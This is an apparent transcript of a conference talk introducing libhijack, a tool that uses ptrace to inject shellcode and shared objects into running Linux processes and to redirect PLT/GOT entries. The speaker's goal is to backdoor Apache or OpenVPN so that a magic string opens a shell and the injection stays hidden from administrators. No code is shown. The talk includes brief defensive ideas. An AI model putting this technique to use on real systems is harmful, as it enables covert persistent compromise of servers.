 My name is Sean Webb, I'm a member of SoldierX and this talk is called Runtime Process Insemination and it's brought to you by SoldierX. Who am I? I am just another random blogger on the inner tubes. I run a tech blog called 0xfeedface.org and I'm a professional security analyst. I've been working professionally for about three and a half to four years. I'm a 12 year C89 programmer. It is the language of love. I love it absolutely. I'm a member of SoldierX, Binary Revolution and Hack3R. All three of them are kind of sister communities related to each other and they're really fun, really good communities to be a member of. If you guys want to hang around on IRC with like-minded people, check those communities out. I have a few disclaimers in my talk. The opinions and views expressed here are solely mine, not my employers. They're not paying me to speak here. My talk is semi-random. There's a lot of things I need to cover, a lot of background information that I need to cover. I'm going to tie it together at the end. It's all going to make sense at the end. In this talk, almost nothing new is explained. The theory is very well known. The underlying theory you can find on frack, Google and quite a few other resources. I am today though going to explain a slightly new technique, a new spin on things. The presentation and tools discussed here are only for educational and ethical purposes only. I'm just saying this to cover my butt. I make a few assumptions in this talk. I assume you know what Linux is, and even if you don't, I'm sorry. The same concepts I talk about here are going to carry over to Windows and OS X. I assume you have a basic knowledge of C and 32-bit Linux memory management. The concepts here apply both to 32 and 64-bit Linux and any other OS you want to use. I assume you know what printf, memset, receive, libc, that kind of stuff is. I assume you know what a heap and a stack are, what an anonymous memory mapping is, what the difference between all three of those are, that kind of thing. I assume you have the ability and desire to think abstractly. We're going to be talking about some abstract ideas here and sometimes in parallel. It can get kind of confusing. If you get confused, I will be in the Q&A room for track three after this talk. This presentation and the tool that we will release at the end of the day today, assuming non-modified memory layout, so that means no GRSEC, no PAX, no ASLR, and even if you do have a modified memory layout, you can get past that, even GRSEC. It takes a bit of work, but it's possible. Give it a little bit of history. For the past few years, I've been diving into CGI and web application vulnerabilities and I used connect back shell code. The shell code, after I exploited it, I'd inject the shell code into the web app and it would connect back to me and drop me into a shell. I needed reliable random access, so I needed to be able to be dropped into a shell, no matter where I'm at, if I'm at home, if I'm in my friend's place, if I'm in a hotel, McDonald's, doesn't matter, I need to be able to get into that shell. So firewall holes are a bit of a problem, because if I'm at friend's place, if I'm at McDonald's, if I'm not at home, I don't control the network. I could hone the network and gain control of it, but I really just want to take care of my end goal, my target. I needed a way to reuse existing connections to the web server. I also needed a way to covertly sniff traffic. There was a time when the traffic was wrapped in SSL for HTTPS and I needed to be able to grab the decrypted SSL traffic. So I created a project called lib hijack and we're going to discuss that a little bit more and we're going to release a new version at DEF CON today, if the network permits. So to set the stage, I've got a shell via a CGI web application exploit and I need a reliable way to get back in. Apache is a really good candidate to target because it's already listening for connections. It's already got its front door open saying, come right on in. So what I need to do my end goal is to modify the Apache process somehow to run a shell when a special string is sent. So when I send it get slash shell HP slash 1.1, it's going to drop me into a shell. So if I run the who I might command, it's going to say Apache. So in order to do that, in order to accomplish that end goal, I need to hook certain functions in runtime. There's some curtain techniques to getting your shell code stored and run. You can store your shell code on the stack. And that used to be really popular. A left one's article smashing the stack for fun and profit uses the stack and that's where most attackers used to put their code. However, on most systems today, the stack is non-executable. So you can't really do that. That's not really reliable. You could store your shell code at the current instruction point or EIP. There's a problem with that. That would work. However, it mucks up the original code. So what you have to do then is back up the code that was going to run, override it with your shell code, and then after your shell code is run, restore the backup. In the previous talk, in the Jew God talk, that's what the author did. But we're going to dive a little bit further into a new technique. And the problem with this technique is you get your shell code only to run once. Your shell code can only run once in this paradigm, in this way, in this mode of thinking. But we need every time that string is sent, get slash shell HPs slash 1.1, our shell code, our malicious code needs to run. So it needs to run multiple times, not just once. We could store the shell code on the heap, but also the heap on a lot of systems today is non-executable. It's becoming more popular to set your heap as non-executable. You could use LD preload, and that would be a great technique, but that requires root and the process has already started. The patch is already running, and you would need to gain root on the system in order to do that. Really, you don't really ever need to root a box unless you're doing some crazy things. So we're going to talk a little bit about process loading, what happens when the exact VE system call is called. The kernel first checks for file existence. Make sure that the file is there, and that you have the permissions to run it. The kernel then loads what is called the runtime linker. A lot of people call that the RTLD. The kernel loads the process metadata and initializes the stack. The metadata is located at that hex address, 08048000 on Intel 32-bit Linux. The runtime linker is going to load the finish loading the process into memory. It loads all the shared objects, all the dependencies. For you Windows guys, those are DLLs. And it finds those shared objects by looking at the dot dynamic section of your binary for the DT needed entries. It then patches what is called the procedure linkage table and global offset table for needed dynamic functions. We're going to dive deep into the PLT-GOT later on in the talk. It then calls the initialization routines and then finally calls main. Finally returns control back to your actual program. Elf. Best movie ever. I love this movie. I started watching it in November. This really isn't related to the talk, but I'm big on Christmas. I started watching it in November. It is the executable and linkable format. It was created by Sun for System 5 and Linux adopted it. Windows file format PECoff is based off of Elf. And Mako OS10 format is based off of Elf as well. All it is is metadata. It's data that describes data. It tells the runtime linker what to load and how to load it. So it describes where to load different parts of the object file. An object file is just a generic term that can mean shared object or your program. Or an object file like when you compile a program and you create an object file and then you link them all together, that kind of thing. An object file contains a main Elf header which contains pointers to other headers. And these other headers are the really important ones. The other headers include the process header, which in order for your object file to be to work, you need one entry minimum. It contains virtual address locations. So where in memory it's going to be stored? It contains access rights, read, write, and execute. And alignment. Where inside that virtual memory, virtual address location, is it going to be stored? In the beginning, in the middle, in the end. You also have section headers. You don't have to have any section headers. All it does is it describes the P headers. It contains a string table and debugging entries if any and compiler comments. When you strip a program, you're stripping out most, if not all, of the section headers. Fun little trivia. Old school viruses used to store their code in the compiler comments section header. Dynamic headers contain the relocation entries. And he stubs in the PLT GOT. And that is the jackpot. That's where we're going to be spending most of our time. Ptrace is the debugging facility for Linux. It is a kernel system call. And GDB, the GNU debugger, relies heavily on Ptrace. If Ptrace didn't exist, GDB wouldn't. It allows you to read and write from and to arbitrary memory locations. If it's valid. And you can write two memory locations that are marked as read only. It allows you to get and set registers. So basically, when you use Ptrace, you are God. You own the process. You own the debuggy. So when we talk about a debugger and a debuggy, the debuggy becomes the child of the debugger. Let's say we're a Firefox developer. And we're finally going around fixing the memory links that every Firefox user complains about. And we're going to use GDB to do it. So we have Firefox and GDB. There are two unrelated programs started at different times. When you attach GDB to Firefox, conceptually speaking, in the kernel, Firefox becomes a child of the debugger as if GDB spawned Firefox. Even though they're started at different times from different places. So when you attach a debugger to a debuggy, it becomes the debuggy becomes a child of the debugger. And I'm going to talk a bit about child processes and parent processes. So it's a little bit easier to speak. And that's what I'm talking about. The debugger is lib hijack. It's GDB. The debuggy is the victim process. Ptrace is destructive. You can do a lot of things with Ptrace that it really wasn't meant to do. In fact, the original, I think the original Ptrace engineer was likely evil. He knew it could be abuse. He probably even crated some back doors on the systems. So we know we have some arbitrary code that we need to store. We can't store it in the stack. We can't store it in the heap. We can't store it in where EIP points to. Where can we store it? So what we need to do is allocate memory in the child. But unlike Windows and OS 10, we cannot allocate from the parent process. The child process must be the one to allocate. In Linux, in FreeBSD, in Solaris, there is no API to allocate memory in a different process. So the child process must be the one to allocate memory. So what we need to do is we need to find where the kernel is called. And the kernel is called by a software interrupt called int80. We need to find out where int80 is in the program. But the problem is the program will never call the kernel. Likely will never call the kernel. Instead it will call library functions which call the kernel. Libc calls the kernel everywhere. So Libc is a great candidate to find where the kernel is called. We can find a library function that calls the kernel by crawling through the alpha metadata, by crawling through all these different headers. So the main alpha header contains a pointer to the process header. Process header contains a pointer to the dynamic headers. And the dynamic headers have a pointer to the global offset table. And the second entry of the global offset table contains a pointer to the link map. It says I set second and the slide says one because we're starting at a zero index. The link map is a structure created and maintained by the runtime linker and DL open. The link map points to each shared object's elf headers. So every single shared object, every single object file, your program, its dependencies have elf headers. And the elf headers contain a symbol table. And a symbol table is basically all the functions, all the global variables, all that kind of stuff that gets loaded in memory. So we'll parse through the elf headers starting at that hex address. The elf headers include lists of loaded functions. So we found int80 by crawling through all the elf headers. I saved you all the nitty gritty details because it's boring. And so we found int80 in a shared object and we backed up the registers. We're going to mess with some of the registers here and we backed them up. We're going to set EIP to the address of where we found int80. And we're going to set up the stack to call the mmap system call. We're going to continue execution until mmap finishes. So what we did is we stored mmap requires you to pass in some certain data. It requires you to pass in a structure. And in that structure, it says where in memory you want this new memory mapping, how long you want it to be, the access rights, that kind of thing. And we stored that structure in the stack. Now that part isn't getting executed. It's just data getting passed to mmap. So that's completely okay to do. So after calling mmap, we now have a newly allocated mapping. And the EAX register contains the address of that newly allocated mapping. And this right here is the new technique, by the way. I forgot to mention that. You can write to it. You can write to that newly allocated mapping. Even if the mapping is marked non-writeable. Even if it's marked read and execute or just read only or execute only, you can write to it. Because with ptrace, you're God. You'll then restore the backed up registers as if nothing happened. And we're going to push a return address back onto the stack. Because the shellcode needs to know where to return control to. Your program Apache was probably sitting there listening for connections and we want our shellcode to run and then have Apache continue on doing its normal thing. So we need a push return address. So we'll decrement the ESP by the size of unsigned long, which is 4 bytes on 32 bit and 8 bytes on 64. And then we'll copy EIP to ESP. We'll then write the shellcode to the newly allocated mapping and set the EIP address to the location of the shellcode. And we'll detach from the process, sit back, relax and enjoy life. We've just injected our shellcode and got it to run. But wait, there's more. Hijacking functions. So we injected our shellcode and that's great. We got our shellcode to run once. But remember, we wanted our shellcode to run more than one time. Any time that receive is called, our code needs to run. So we're going to take a look at the global offset table and the procedure linkage table. What that is, is it's an array of function addresses. Anytime your program calls printf or receive memset, any function that comes from a shared object, it's actually going to, it's not actually going to call that function directly. It's actually going to call a stub entry in the GOT which then calls printf. And that allows your program to be relocated in all the shared objects, all the dependencies, to be located in completely random places in memory. And allows your programs to still be able to call printf, receive, memset, no matter what. No matter where it's loaded in memory. And all your reference functions are in the GOT PLT. In the global offset table, procedure linkage table. So we're going to use a technique that Silvio Cesar architected called PLT GOT Redirection. And we're going to create a stub entry in our shellcode and we're going to overwrite that stub address with the address of where the function is really loaded in memory. And then we'll replace its corresponding entry in the GOT with the address of our shellcode. And that's the redirection, that's it. You've now hijacked a function. But when you're hijacking functions, be careful. Because multiple shared objects can implement functions of the same name. Even though they may have different signatures. So let's say Apache was hysterically written in ugly C++ and it used libc as well. So it uses libc++ and libc. And let's say libc++ implemented printf. And libc implemented printf as well. So we have two library functions that implemented printf. That is completely valid. There's no problem with that. And they can even have a different signature, a different function prototype accepting different arguments and returning different return value. So you want to make sure that you target the correct function. You need to know your target well when you're hijacking functions. What I do is I set up a VM and I mimic the victim. I set up even the same OS, the same patch levels, the same type of proprietary software. I mimic my victim 100% so that I know what I'm getting myself into so I can dive into it deeply and not have any surprises. Once you hijack, you cannot reliably remove a hijack because of the multiple shared object issue. Because libc and libc++ can implement functions of the same name or name your library there. So we want to be able to inject shared objects and why do we want to do that? Because we don't want to have to write a ton of shellcode. Assembly is tedious. It is architecture dependent. It doesn't allow you to move freely as freely as you would if you needed to hone a lot of systems in a short amount of time. So what we want to do is write and see or use other libraries. The possibilities are endless. You could write your malicious code in Haskell or Erlang if you wanted. I don't know why you would, but you could. So there are two ways of doing it. And there's the cheating way. Use a stub shellcode that calls dlopen. And that's what every single project does out there. InjectSO does that. Jougod does that. And right now libhijack does that as well. There's also the real way which is rewrite dlopen in the parent process, in libhijack or your debugger. So the cheating way, what you'll do is you'll allocate a new memory mapping. Using the new technique I showed you on how to force the child to allocate a new memory mapping. And you'll store some auxiliary data in the mapping. You'll store the file system path of where the shared object resides. You'll store the name of the function to hijack and the stub shellcode. And the stub shellcode will call dlopen and dlsim. So it'll call dlopen to open your shared object and dlsim to find the address of your malicious function. It'll then replace the global offset table entry with the entry found via dlsim. So it'll find out dynamically where your function is located in memory and then replace in the GOT where your malicious function is located. The cheating way has some advantages. It's easy. I've written the assembly code and I'm going to release it today for you. It is extendable. All you have to do to hijack more functions, multiple functions, is literally just copy and paste code. It is fast. Assembly is fast. Handwritten assembly is usually fast if you write it right. There are some disadvantages though. When you do this technique, you're going to have an entry in the maps file in PROC PIN maps. And so when a system administrator thinks that a patch is acting weird, he's like, hmm, it's been pwned. One of the things that it'll do for forensic purposes is he'll look in PROC PIN maps for anything that might be evil or malicious. And he'll see, because you used dlopen, that your shared object was loaded. That your malicious shared object was loaded. And you rely on architecture-dependent stub shellcode. I don't know, maybe you're pawning a web farm that has a mix of 32-bit and 64-bit systems. So now instead of having one set of code, now you have to duplicate your code and do the exact same thing for 64-bit, which on Linux has a slightly different calling convention than 32-bit. So the real way, you want to reimplement dlopen by loading the dependencies of your malicious shared object yourself. Some of the dependencies can be loaded via dlopen, and some of the dependencies might not need to be loaded at all. Like libc is in just about every single program out there. I don't think I've seen a program that didn't depend on libc. So you load your dependencies by hand for the most part. If you want to implement a sniffer using libpcap inside of Apache, which you can do with libhijack, you wouldn't want to have a system administrator look at the procpidmaps file and see that libpcap is loaded. If I were a system administrator and I saw that, I'd be like, what the freak? I'd be like, we've been pwned. So what you'll do is you'll create memory maps. And you'll write shared object data to those new memory maps. You'll look at the process headers, which tell you how to load that shared object, and you'll load what it tells you to in these new memory mappings. And then you'll patch into the runtime linker. And that's important because the runtime linker, it's the one responsible for resolving where in memory functions are located, like printf and memset and mmap, that kind of thing. You'll run the initialization routines of dependencies that you loaded by hand. You do not run the initialization routines for dependencies that have already been loaded or that were loaded by DL Open. And then you'll do the PLTGOT redirection technique. You'll hijack the global offset table. There's some advantages to that. It's completely anonymous. So now you've hijacked receive in Apache and the system administrator, when he cats procpidmaps, it's not going to see anything out of the ordinary. He's going to see, oh, libc is loaded. That's cool. So he's going to just continue on his way. It's extensible. You can extend it really easy. It's really powerful. There are some disadvantages, though. There's just one disadvantage. It takes a lot of freaking time to implement and research. I've been looking at this doing the real way for about a year to two years off and on. And I know it from a higher level perspective, and I'm just barely starting to understand it from a really low level perspective. But it's really hard to implement. There's probably around a million lines of code to read through. It's a major project. Shared objects can have dependencies. Shared objects have their own procedure linkage table and global offset table. Prior to this slide, we were talking about the program's main GOT PLT. But each shared object, because it can be loaded in random spots in memory, and because it can depend on other shared objects, it has its own PLT GOT. So what you'll do if you can hijack inside of shared objects, you can hijack inside the main program, and you can hijack inside shared objects. What you'll do is you'll loop through the dynamic structures found in the link map, and you'll use the same PLT GOT redirection technique against the shared objects. It's the exact same principle. You can even hijack shared objects that have been loaded via DL Open. So Pigeon is a great example of that, and even Apache, it uses DL Open heavily. It uses just about everything as a plugin. All it is is it's a front end to all these plugins, to all these back ends. And you can hijack shared objects that have been loaded via DL Open, because DL Open injects a new link map entry. Lib Hijack makes injection of arbitrary code and hijack of dynamically loaded functions extremely easy. Lib Hijack right now is around 1,800, 1,900 lines of code, and I've made it so easy for you that you can inject your shell code in as little as 8 lines of C. It loads shared objects via the cheating method right now because the real method, the real way, is really freaking hard to do. Injecting shell code, you can inject shell code in as little as 8 lines of C. It has full 32-bit and 64-bit Linux support on the Intel platform. So that includes AMD as well. I develop mainly on 32-bit, and I've abstracted most of the things away so that I don't really have to test heavily in 64-bit. I do most of my testing in 32-bit, and I've abstracted all the architecture-dependent code away so that all the new features I write, I don't have to worry about architecture. Other OSes are coming soon, so we're working right now on porting to FreeBSD, and we have some interest in porting to OS 10. I'm always looking for help. This is a fun project. It's challenging. There's a lot of problems to solve in unique ways, and I'm always looking for help from programmers that write good C89. That's where my project is located. You guys all have CDs, and you can copy and paste that link. That's where you can find my project. Clone it, fork it, whatever you want to do. At the end of the day, I'm going to release version 0.5 of lib hijack. In this release, it's a major milestone release. You can hijack within shared objects. It does break existing 0.3 and 0.4 API. Most of you, if not all of you, really don't have to worry about that because those releases were private, or semi-private. I fixed some massive memory leaks. I had an issue. Before this release, lib hijack... Should I give it a go? Anyways, I fixed some massive memory leaks. Before this release, the usage of lib hijack was pretty limited. Its scope was pretty limited. It was mainly just hijacking major functions that your program calls. But now that you can hijack within shared objects, you can do whatever you want to do with lib hijack. You can create a fuzzer, you can create some sort of hypervisor. You can do all sorts of things with lib hijack. Its possibilities are limited only to your imagination. Before this release, I really didn't care about memory leaks. I was like, ah, it's just going to do its thing and quit. And it's going to do it well, of course. But it has some major memory leaks. It would fill up to 27 megs when I injected code into OpenVPN. And now I've trimmed that down, so it only takes up 256K when injecting into OpenVPN. So I've fixed some massive memory leaks. Probably better than Firefox. So there's been some various bug fixes. I had a few bugs with M-Map calling M-Map. I fixed that. Now that one scared me, was not expecting that. So we still have some things to do with lib hijack. There's still some things left to do. I need to figure out why certain functions don't show up in GOT resolution. There's some really weird issue going on in the GOT resolution that just some functions just don't show up. I think I might be quitting a little bit early or stopping the resolution. Not quitting, but stopping the resolution a little bit prematurely. And in 0.6, we're also going to hopefully support injecting shared objects the real way. This release is about six months out, and I'm hoping that I have about four months of research left, and then I'll do two months of implementation. So we're working on porting to FreeBSD. The real way injecting shared objects the real way is more important than the FreeBSD port. But if someone wants to go ahead and do that for the 0.6 release, I'm accepting patches. Whoa. If you're looking for an adventure, port it to Android. I'd love to see the security implications of it running on Android. Android uses Elf, it's Linux, and everything, it runs itself. So you could hijack some sort of Java program and do some sort of cool things with that on Android. I'd really love to see that. I'm always looking for help. So if you have some interesting ideas, implement them and send me a patch file. So we know that we can hijack functions, and we now have a tool that makes that really easy. So what we can do, what can we do to prevent it? We're security analysts and security engineers, some of us. So what we can do is we can make sure the PL2 GOT entries point to the correct library. But like I said, multiple libraries can implement functions of the same name. Yes, God? So what we can do? How do you do that? There's no way to do that. Oh, yeah. Okay. They hate me, don't they? Okay, so we can't really do that. That's not really a viable option because libc, like I said earlier in the talk, libc and libc++ can implement functions of the same name. In runtime, there's no way to be able to figure out which printf is the right printf. You can use detrace. I am in love with detrace. Detrace was created by Sun for Solaris, and it is non-destructive debugging. It allows you to debug, dive down into your programs. Oh, yeah. There we go. Okay. It allows you to dive down into your programs and do it non-destructively. There are some destructive things that you can do with detrace, but you're very limited on what you can do. Okay, so you can limit ptrace usage. Like the Apache user in Linux, by default, is able to use ptrace, and there really should be no reason for that. But Linux, being the great operating system it is, is never going to get true security. It's never going to get true security. It's never going to get RBAC. I love this. Okay. RBAC is a great security solution that true enterprise operating systems have implemented. Solaris uses it. Linux needs it, but I don't think that Linux is going to get it because of all the politics surrounding kernel development. So you could use static binaries, but that is a major disk and memory usage hog. If you compiled everything statically, lib hijack really won't even work. Disk usage is not that big of a deal, but memory usage is. You could maybe create some sort of smart hypervisor solution. You could use GRSec or PAX, but that only protects to a certain extent. Or you could use static and dynamic, a mixture of static and dynamic profiling. So you can profile the program before it's even ran and say this is what it's going to do. These are the kind of shared objects and things that it's going to run. And you can dynamically check while it's running whether the dynamic profile matches the static profile. You'll watch for changes in the global offset table. And you'll make sure changes reflect the static profile. But what about shared objects loaded via DL Open? The static profiling doesn't help with plug-in architectures. Just about every program that you use today, Firefox, Pigeon, Apache, just about anything, it's all plug-ins. So I'm going to do a little bit of a demo. I'm going to show you what happens when I inject a shared object. So I need to set up a mirror on my display so that things can look right. Okay, so right here. Can everyone see that? Is that a good thought? All right. So we have OpenVPN running a server right here. And what we're going to do is we're going to connect to it. And what we're going to do is when I send it, that command, it's going to drop me into a shell. Right now you can see I send it. It's working normally. It's not going to drop me into a shell. So we're going to run the Inject Shared Object Program, which I'm going to release today with lib hijack. It's a part of it. Oh, that's awesome. I'm running this demo as root, but because of the awesome security in Linux, it doesn't have to be run as root. It has to be run as the same user as your target process. So if you're targeting Apache and it's running as the Apache user, then it needs to run as Apache. But I'm doing it with root just because it's easier. We've just injected a shared object into OpenVPN. And we're going to cat the PROC PID maps file. And I'm going to show you that it's there. You can see that the shared object is loaded. Our malicious shared object is loaded. So now I'm going to connect to OpenVPN, type in shell. It didn't disconnect me. We now have a shell. And we can see that OpenVPN is still running. And it's running like usual. So that is my talk. Thank you very much for coming. I really enjoyed speaking here.